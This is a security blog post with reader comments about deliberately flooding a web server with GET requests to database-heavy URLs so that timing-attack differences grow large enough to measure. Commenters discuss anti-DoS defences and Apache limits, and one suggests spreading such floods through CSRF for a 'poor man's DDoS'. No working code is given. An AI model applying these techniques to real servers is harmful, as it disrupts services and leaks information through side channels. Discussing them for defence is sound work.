Cenzic 232 Patent
Paid Advertising
web application security lab

Exaggerating Timing Attack Results Via GET Flooding

A post by Super-Friez got me thinking of an actual useful application for GET request flooding this evening. Normally we only think of GET requests as a binary thing - one at a time or flooding. But what if we only launched enough GET requests with the intention of impacting server load, not bandwidth latency. So picking the right URL would be critical here (DB impacts, most likely).

When you found the right URL, launching a GET request flood against the server could seriously delay certain types of requests (especially if they must touch a database two times versus one time, for instance - if the DB was part of the flooding). Suddenly something that is normally the difference of a few microseconds could be the difference of seconds. Who cares? Because I’m always curious if there are any practical applications in hacking for DoS and this appears to be one of them - at least in theory.

20 Responses to “Exaggerating Timing Attack Results Via GET Flooding”

  1. kuza55 Says:

    /me nods
    I’ve got some stuff lying around where this is integral to some (timing) attacks.

  2. ChrisP Says:

    There are network-level protection mechanisms against this type of attack. The anti-DoS establishes a normal traffic profile during peace time learning. Once that’s done, it sets the anomaly threshold to twice the values acquired during learning. An abnormal rate of requests from a single source IP will be rapidly flagged and sent to an analysis module, which will for instance 302 the requester and check whether the redirect is followed. If the 302 is obeyed and the rate doesn’t decrease, the source is quarantined.

  3. c Says:

    Hmm. Say you take your “two database requests” app. What if the app would leave itself in a bad state if only the first of those DB calls goes through?

  4. dune73 Says:

    This plays into something that has been dubbed as request delaying. It has been discussed in the apche users list recently. See http://marc.info/?l=apache-httpd-users&m=119567035007066&w=2 (this is where the interesting bit starts)

    This is a scary form of DoS. It’s hard to defend against it.

  5. RSnake Says:

    @kuza55 - really? I’d be curious to see what it was.

    @ChrisP - I thought you guys were against the concept of training, because how can you ever (with confidence) say you weren’t attacked during your training? Obviously that would solve it if you /dev/nulled the requests, but then your run into the Victoria’s Secret problem where they thought they were under a GET request flood, but it turned out it was everyone tuning into their online video cast of their models. Programmaticaly it was anomalous but it actually had totally benign intentions (as benign as a million horny guys can be, I suppose).

    @c - that’s a good point. Obviously that would cause problems (this is anything but a perfect technique).

    @dune73 - It’s not actually that hard to defend against, it’s just not commonly defended against, and it’s got lots of false positives associated with trying to defend against it. Probably the most elegant solution to GET DoS that I’ve seen was Netscalar’s solution where they supplied a “question” in JavaScript space, and if you answered the question with your browser they’d let you in as higher priority, if not, they’d still let you in, but way way lower priority. That meant that at least you still had to write a robot that did some computational work. You couldn’t just open a ton of sockets and leave the system hanging. There are lots of other anti-DDoS tools that don’t initiate an actual request until the GET request goes through (which in this case it would have to to make the database request) so therefor I find those solutions less elegant for this particular problem.

  6. ChrisP Says:

    In this case, it’s network (L3/L4) learning which is a little less error-prone than L7 learning. The reason I say this is because your web site is rarely under constant DoS attack, while it could be undergoing free pen tests from web app hackers on a daily basis without raising the network traffic voume to alarming levels. The free pen tests would indeed pollute a WAF’s dictionary if it’s in learning mode while the attack occurs. The L3/L4 anomaly detection device doesn’t care about the HTTP POST/GET query string.

    The anti-DoS box classifies traffic as either new conns (TCP SYNs), packets (all types), requests (packets with payload). The post learning threshold is quite liberal in the sense that it allows a burst of twice as many events compared to the baseline established during learning. The million horny guys have a unique characteristic: it’s a million different source IPs. An anti-DoS device would attempt to detect legitimate requests from spoofed one using SYN cookies. They would then be sent on the the HTTP servers - there’s a few techniques on load balancers that can deal with flash crowds and redirect users to sorry servers for instance.

  7. bronc Says:

    It’s interesting this topic came up, as a few weeks ago I was looking at this same issue, but from more of a performance point of view.

    Having a background in security crap, my initial thoughts were how I figured out to DoS basically every site on the net running this commercial software I was having this problem with.

    On a FreeBSD system, using Apache 2, MySQL and with the application itself coded in PHP, I was able to make repeated calls to a several dynamic URLs generated by the app itself, and was able to make my box stop in it’s tracks. The system itself is a VERY powerful Dell Poweredge system (quad core, several gigs of ram, etc), yet because of the overhead of the Sql calls, and PHP itself (total crap - Perl 6 anyone?), it was easy to lock up a processor and then watch the context switching begin - in a minute or so the processes starting running out of available memory (as limited by the kernel) still as more request came in. This caused a delay in each call, until eventually Apache ran out of processes it could start.

    As each call slowed the box down it caused a delay. As the delays started adding up, even with KeepAlives off in Apache, it still ran out of processes in a matter of an hour or so.

    Really this is just as effective as eating up someones bandwidth with a DoS, but a lot easier. I haven’t played with the AJAX framework a lot, but I can imagine it might be ripe for the picking as well.

    PS. Did anyone know RSnake moved to Texas for his favorite past time? Armadillo racing! You should see his trophy case!

  8. Ronald van den Heetkamp Says:

    As for Apache, most all HTTP requests are simultaneous proccessed in memory, and usually not killed after a connection close, a second HTTP request runs in the same memory proccess as the previous initiated, which results in no detectable difference at the client.

    So I nod horizontally today :)

  9. RSnake Says:

    @ChrisP - ah, I didn’t realize you were talking about TCP packets and not HTTP requests. That makes a lot more sense.

    @bronc - awesome, that is pretty cool, and exactly what I was talking about.

    P.S. did everyone know that Bronc went to prison for his favorite past time? I’ll let the imagination run wild. ;)

    @Ronald - that is absolutely true, if you only have two connections that are non-blocking (which is almost never actually true when you’re talking about DB inserts), but if the server allows 100 simultaneous connections and you use 99 for your DoS and the other 1 for your test, you often are reaching the point at which the server cannot handle much more throughput without visible changes to the amount of time things take to run (again, because DB’s are almost always blocking).

  10. Ronald van den Heetkamp Says:

    So what you talk about here is based upon a child process denial of service?

    Cause it depends, Apache has a default five child process limit. So if you increase that it wouldn’t be a problem, I’m not sure about how many sysadmins do that actually, but that could work yes, but it’s easy to solve by increasing it instead of increasing memory (bad). And again, it also depends how you run PHP for instance, like mod_php (loaded into memory faster) or fast CGI (slower), but I guess it’s a trade-off here again, but increasing memory isn’t the solution.

    Still, I can’t see how it can be used for timing attacks which you talk about, because if you exaggerate a timing attack you wouldn’t get much benefit from it, since it stalls the thing overall and becomes even more unpredictable when you don’t know when Apache start swapping memory due to high memory, or the above arguments, or as I would like to say: it becomes more unstable instead of more precise time diffs.

    if I’m wrong, do let me know.

  11. RSnake Says:

    @Ronald - It doesn’t make it unstable (you’re thinking about real DoS, and I’m thinking about just flooding enough so that you start seeing delays), it just slows things down. Let’s say you have a 10ms difference between state A and state B. That can be muddied by network latency, while a few seconds really can’t. It can help remove one question mark from your timing attack. See what I’m saying?

  12. Ronald van den Heetkamp Says:

    Aaaaah okay, you want to reach stability through it! I think that’s feasable, granted that no other users are hitting the thing the same time, like hitting refresh every couple moments which makes it muddy again. ;)

    So yeah it’s plausible when you can control the noise (other users) that could disturb it. It would be nice to try this out some time, I guess it’s hard to draw conclusions yet. ;)

  13. digi7al64 Says:

    Have i missed something or are we simply talking about flooding a server with “GET” requests? If so why not use CSRF to launch such attacks. This means the attack is never generated from 1 single IP and is much harder to block. Tie that in with some unique URL generation code (to bypass url matching) and you have a poor mans DDos attack.

  14. digi7al64 Says:

    oops, should have read the title - so essentially you want to slow the server down to determine time delays. Well you could use the attack i mentioned to generate traffic and then use your own session as a “control” to determine a baseline. Either way though, i think you are putting too many variables into the equation to obtain a definitive conclusion using this method.

  15. SaveBurma! Says:

    By the way, Timing attack is hot in attacking VOIP.
    Nortel has been doing a good defense.

  16. bronc Says:

    A good way to see the delay times is to use MySQLs CLI to look at it’s debugging info (threads, delays, long queries, etc). This can really show you from the MySQL side how those requests to Apache can slow things down. On our system we could watch it in real time, with really bad/slow queries.

    PS. When ya coming back home? I’m all alone!

  17. RSnake Says:

    @digi7al64 - I don’t think using other people to do CSRF get flooding would work because you’d have no idea how much traffic you were sending. If you controlled the flooding though, you’d have a much better sense of what was going on. Any you’re right it would add in an extra variable, but only if you only performed the test once. If you do it a few dozen times you could be almost 100% sure the test result was valid.

    @bronc - Isn’t Mr. Big taking care of you?

  18. bronc Says:

    Mr.Big quit and is moving up to the bay - where I just moved from. I’ve stuck with his gig now!

  19. Matt Says:

    I personally know about GET floods bringing down production systems when interacting with the db.

    I work for a very large company and we were bringing in a large search provider to “improve” our intranet search experience. Well the way the search appliance worked was to gather a list of urls to crawl, and go into a while loop similar to the following:

    while (there are more pages to crawl) {
    get a page from the list
    open a new connection to the page
    get the html response
    release the connection
    parse the html for new links
    add new links to pages list
    }

    The problem we ran into was that a “Production” application was designed like this:

    On receive of a GET request {
    if no session exists {
    create a new session
    create a new db connection object
    store db connection object into session
    }

    get db connection from session
    access information
    restore connection object to session object
    }

    Well, with a little study we found out that the appliance, using only GET requests, brought down the entire site at a crucial point during the night almost costing potentially millions of dollars.

    The issue turned out to be the search appliance was creating sessions on the site faster than the Java garbage collector could reap them, which eventually led to full resource cinsumption of db connections.

    So YES, GETs can DoS a site.

  20. r Says:

    As a system admin for a large dedicated hosting provider I am asked to help sites experiencing “DoS attacks” on a routine basis. Usually there is no DoS attack, just non-indexed SQL queries on per-connection logic.

    “Solving” these DoS attacks is often as simple as adding indexes to tables in high-volume queries, adding PHP bytecode caching (APC, usually) and enabling KeepAlives.